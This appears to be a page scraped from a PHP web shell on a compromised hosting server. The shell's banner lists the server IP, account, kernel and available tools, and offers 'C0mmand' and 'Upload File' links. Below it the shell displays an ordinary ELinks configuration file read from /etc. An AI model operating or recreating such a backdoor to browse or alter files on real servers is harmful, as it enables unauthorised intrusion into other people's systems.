Server IP : 103.53.40.154 / Your IP : 3.140.196.5 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /etc/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
## ELinks 0.12pre3 configuration file ## This is ELinks global configuration file. You can keep global ELinks ## configuration here. Each user can also save its own ELinks configuration ## to ~/.elinks/elinks.conf. The per user configuration file can be edited ## by ELinks when you save options through UI. ## connection # Connection options. ## connection.ssl # SSL options. ## connection.ssl.cert_verify [0|1] # Verify the peer's SSL certificate. set connection.ssl.cert_verify = 1 ## connection.ssl.trusted_ca_file <str> # The location of a file containing certificates of trusted certification # authorities in PEM format. ELinks then trusts certificates issued by # these CAs. # # If you set this option to an empty string, default NSS root certificates # are loaded. # # If you change this option or the file, you must restart ELinks for the # changes to take effect. This option affects GnuTLS and nss_compat_ossl # but not OpenSSL. set connection.ssl.trusted_ca_file = "/etc/pki/tls/certs/ca-bundle.crt"